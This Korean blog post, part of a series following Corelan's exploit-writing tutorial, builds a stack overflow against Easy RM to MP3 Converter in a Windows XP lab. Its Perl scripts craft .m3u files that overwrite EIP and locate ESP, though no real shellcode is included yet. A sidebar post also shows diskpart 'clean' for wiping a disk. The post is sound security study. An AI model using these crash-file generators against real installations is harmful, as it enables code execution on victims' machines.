[exploit writing] 1_스택 기반 오버플로우 (5)

-

목표 

EIP와 ESP 까지의 크기를 알았으니 이제 원하는 값을 ESP와 EIP에 넣어 보자.

과정

1. 길이를 모두 알았으니 test 파일을 수정해보자

my $file = "crash25000_EIP_BBBB.m3u";
my $junk = "\x41" x 26064;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE, ">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created Successfully \n";

2. EIP에는 42424242가 들어가 있고, ESP에는 43434343이 들어가 있음을 확인할 수 있다. 이제 우리는 EIP를 통제할 수 있게 되었다.


esp 가 0x43434343 이라는 것은 두번째로 작성했던 메모리에 대한 설명을 다시 보면 알것이다. 또한 ESP 와 EIP 는 모두 32bits 이므로 BBBB 값과 CCCC 값이 각각 저장되는 것이다.

3. 이쯤에서 버퍼 오버플로우로 인해 스택의 모양이 어떻게 변했는지 확인해보자. 함수가 리턴(ret)할 때 BBBB가 EIP에 들어가게 되고, 프로그램의 흐름은 42424242라는 주소로 이어지게 된다.

/*의문점*/
분명 처음에 ESP는 버퍼의 시작 부분(스택의 꼭대기)을 가리키고 있다고 했는데 이제 보니까 EIP 위에 있는 걸 위 메모리 그림을 보면 알 수 있을 것이다.

/*발견*/
보통 정상적인 메모리의 ESP라면 버퍼의 시작부분을 가리키지만
버퍼 오버 플로우가 발생한 뒤의 ESP는 EIP 위에 놓이게 된다~!

4. 공격자가 EIP 를 통제할 수 있게 되면 공격자의 궁극적인 의도를 싷할 쉘코드를 가진 곳을 EIP가 가리키도록 해야한다.

5. 공격 대상이 되는 프로그램에서 충돌이 발생할 때 레지스터들을 살펴보고 덤프를 해보자. 만약 우리가 입력한 버퍼 데이터를 레지스터 중 하나에서 볼 수 있다면 쉘코드로 그것을 대체할 수 있으며, 또한 그 위치로 점프도 가능하다. 앞에서 우리는 ESP에 'C' 문자 값이 들어가 있는 것을 확인했는데, 이번에는 'C' 문자 대신에 쉘코드를 넣어 EIP가 ESP 주소로 가도록 해보자. 

6. 비록 ESP에 'C' 문자가 들어가 있었지만, ESP가 가리키는 첫 번째 번지가 우리의 목표 번지라는 것을 확신할 수는 없다. test.pl 스크립트를 조금 수정하여 테스트 해보자. 앞서 사용한 'C' 대신에 144개의 문자를 사용해 보겠다.

my $file = "crash25000_EIP_BBBB.m3u";
my $junk = "\x41" x 26064;
my $eip = "BBBB";
my $shellcode =
"1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK".
"5ABCDEFGHIJK6ABCDEFGHIJK".
"7ABCDEFGHIJK8ABCDEFGHIJK".
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;close($FILE);
print "m3u File Created Successfully \n";

7. 어플리케이션에서 충돌이 발생하 때 ESP 위치의 메모리를 덤프해보자.



오류가 뜨고 1) d esp를 통해 ESP의 버퍼를 보고 2)d를 통해 메모리의 내용을 대략적으로 보았다.

8. 여기서 흥미로운 점 2가지를 확인할 수 있다.

     1> ESP는 $shellcode에 사용된 문자들 중 5번째에서 시작한다. (1ABCD)
     2> 패턴 문자열 다음에 A 값들이 있는 것을 볼 수 있다. 이 A들은 대부분 버퍼의 첫 부분에 속하며, 그래서 우리는 RET를 덮어 쓰기 전에 우리의 쉘코드를 버퍼의 첫 부분에 넣을 수도 있다.

9. 먼저 패턴 문자열 앞에 4개의 문자열을 추가하고 다시 테스트를 해보자. 만약 우리의 의도대로라면 ESP는 이제 우리가 제공한 패턴의 시작 부분을 가리킬 것이다.

my $file = "crash25000_EIP_BBBB.m3u";
my $junk = "\x41" x 26064;
my $eip = "BBBB";
my $shellcode =
"QQQQ1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK".
"5ABCDEFGHIJK6ABCDEFGHIJK".
"7ABCDEFGHIJK8ABCDEFGHIJK".
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;close($FILE);
print "m3u File Created Successfully \n";


10. 이제 우리는 다음과 같은 결과를 가지게 되었다.



1) EIP에 대한 통제권 
2) 원하는 코드를 쓸 수 있는 공간 
3) 0x000ff730에서 시작하는 우리의 코드를 직접 가리키는 레지스터


출처 : Exploit Writing By Corelan

댓글

댓글 쓰기

이 블로그의 인기 게시물

윈도우 설치에서 파티션 설정 오류(NTFS)

-
이미지
요즘 컴퓨터 OS를 갈아엎느라 시간가는 줄 모르게 컴퓨터를 해댔다. 다른 거 할 수도 없었다. 네트워크도 공부해야하는데 하지 못했다. 그래서 내가 포맷하고 OS 설치하면서 겪은 오류들을 적고자 한다. 처음 OS를 쓰다가 USB로 OS를 설치하다 보면 전에 쓰던 OS를 갈아엎는 경우가 있다. 밑의 그림처럼 나올 것이다. 그럼 주 하드디스크를 포맷버튼 누르고 OS를 설치하고 싶을 것이다. 하지만 대부분은 오류가 떠서 안될텐데..되면 말고.. (출처: http://digitaku.com/719) 윈도우를 NTFS로 포맷된 파티션에 설치해야하다는 오류가 뜬다면 (출처: http://caleb1783.tistory.com/362) 1. 우선 설치 시작화면으로 돌아가서 2. shift+f10 으로 cmd를 띄운다. 3. diskpart 명령어를 치고 enter을 누른다. 4. list disk 를 통해 디스크 목록을 본다. 5. 포맷하고 싶은 디스크를 확인한다. 6. 만약 disk0이면 select disk0 을 통해 disk0을 선택한다. 7. 그리고 가장 중요한 clean 명령어를 통해 깨끗히 지운다. 8. exit을 통해 나간다. 9. 다시 컴퓨터를 껐다가 usb 부팅을 통해 OS를 설치한다.
자세한 내용 보기

[exploit writing] 1_스택 기반 오버플로우 (1) First

-
이미지
Corelan가 쓴 Exploit Writing 을 통해 이제 뭔가 보안 공부의 첫 걸음을 시작하려 한다. 목표 윈도우 xp에서 의 취약점을 이용한 스택 오버 플로우 한다. 준비 프로그램 1. kali (가상 머신) 2. windows xp (가상 머신) 3. windows xp 에서 windbg 4. windows xp 에서 펄 스크립트를 사용하기 위한 액티브펄 5. windows xp 에서 펄 스크립트를 사용하기 위한 per dev kit 6. Easy RM to MP3 Converter 과정 1. 우선 xp에서 Easy RM to MP3 Converter를 설치한다. 2. 빈 윈도우 xp에서는 위에 쓴 준비물 중 펄 스크립트 파일을 실행시키기 위한 프로그램들을 설치한다. 3. 메모장에 밑의 코드를 작성하고 test.pl이라는 이름으로 저장한다. my $file = "crash.m3u"; my $junk = "\x41" x 10000; open($FILE, ">$file"); print $FILE "$junk"; close($FILE); print "m3u File Created Successfully \n"; 4. 그럼 밑의 그림처럼 아이콘들이 있을 것이다. 6. test 파일을 실행 시키면 위에서 봤듯이 crash.m3u 라는 파일이 생성될 것이다. (커맨드 라인을 이용해서 test 파일을 실행시키면 m3u File Created Successfully 문구가 나옴) 7. 이제 Easy RM to MP3 Converter를 실행시키고 crash 파일을 LOAD 하면  에러 메시지가 나온다. 이 수행결과는 converter 가 crash 되지 않고, 정상적인 에러 메시지를 출력함을 알 수 있다. 8....
자세한 내용 보기

하둡 설치 오류 정리

-
이미지
길고 긴 설치였다. 이틀동안 하둡 설치하는데 시간을 다 썼다. 이 때까지 오류 나왔던 것들을 다시 한 번 정리하는 의미에서 글을 쓰겠다. 이 게시글은 설치 가이드가 아닌 오류를 정리하는 글이다. 우선 나의 하둡 설치 환경에 대해 설명하자면, VirtualBox 에서 3개의 우분투 16.04버젼을 설치하고 컴퓨터의 이름은 hadoop1-VirtualBox hadoop2 hadoop3으로 하였다.  첫번째 로 만났던 고난은 리눅스의 계정 관리였다. 되도록이면 adduser을 통해 3개의 가상 머신에 hadoop이라는 계정을 만들어주는 걸 강력 추천한다. 그래야 나중에 혼동이 없고 configure 파일 수정할 때 편리하다. hadoop@hadoop1-VirtualMachine $ 위와 같이 써있으면 전자 hadoop은 계정이고 후자는 컴퓨터 이름이다.  두번째 는 ras_pub 이었다. 즉, ssh 연결할 때 비밀번호 없이 공개 키를 주어 접속할 수 있도록하는 방법이다. hadoop@hadoop1에서 hadoop@hadoop2로 ssh 접속을 하기 위해 전자에서 후자로 공개 키를 복사해서 주었을 것이다. 책에서는 이렇게 하면 끝이라고 했지만 후자에서 전자로 또 공개 키를 복사해주는 것이 좋다고 한다.  세번째 는 네트워크 접속 거부이다. 여기서 엄청 애 먹었다. iptables 나 netstat을 통해 이것저것 다 해봤다. 가장 효과적인 것은 gufw 를 apt-get install 해서 방화벽을 재설정했다. 나는 9000, 9001, 50070, 50090 포트를 모두 열어놨고 내부 네트워크에서 오는 접속은 모두 허용했다. 마지막으로 내가 생각하는 해결책은 /etc/hosts 에 있는 파일을 수정하는 것이다. 설치 가이드를 보면 이 파일을 수정하게 되는데 아래와 같이 되어 있었다. 127.0.0.1 localhost 127.0.1.1 hadoop1 두번째 있는 127.0.1.1 ...
자세한 내용 보기